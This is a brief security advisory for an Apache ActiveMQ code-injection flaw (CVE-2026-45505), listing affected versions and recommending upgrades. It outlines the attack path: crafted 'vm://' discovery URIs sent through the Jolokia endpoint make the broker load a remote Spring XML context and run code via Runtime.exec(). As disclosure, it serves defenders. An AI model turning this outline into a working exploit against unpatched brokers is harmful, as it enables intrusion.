Apache · Activemq · CVE-2026-45505
**Name of the Vulnerable Software and Affected Versions**
Apache ActiveMQ Broker versions prior to 5.19.7
Apache ActiveMQ Broker versions 6.0.0 through 6.2.5
Apache ActiveMQ All versions prior to 5.19.7
Apache ActiveMQ All versions 6.0.0 through 6.2.5
Apache ActiveMQ versions prior to 5.19.7
Apache ActiveMQ versions 6.0.0 through 6.2.5
**Description**
Improper input validation and improper control of code generation allow for code injection. The software exposes the Jolokia JMX-HTTP bridge at the '/api/jolokia/' endpoint. The default access policy permits execution operations on ActiveMQ MBeans, specifically the `BrokerService.addNetworkConnector(String)` and `BrokerService.addConnector(String)` functions. An authenticated attacker can use a crafted discovery URI, such as `masterslave:vm://...,...` or `static:vm://...`, to trigger the `brokerConfig` parameter of the VM transport. This causes the `ResourceXmlApplicationContext` to load a remote Spring XML application context. Since singleton beans are instantiated before configuration validation, arbitrary code can be executed on the broker's JVM via bean factory methods like `Runtime.exec()`.
**Recommendations**
Upgrade Apache ActiveMQ Broker versions prior to 5.19.7 to 5.19.7.
Upgrade Apache ActiveMQ Broker versions 6.0.0 through 6.2.5 to 6.2.6.
Upgrade Apache ActiveMQ All versions prior to 5.19.7 to 5.19.7.
Upgrade Apache ActiveMQ All versions 6.0.0 through 6.2.5 to 6.2.6.
Upgrade Apache ActiveMQ versions prior to 5.19.7 to 5.19.7.
Upgrade Apache ActiveMQ versions 6.0.0 through 6.2.5 to 6.2.6.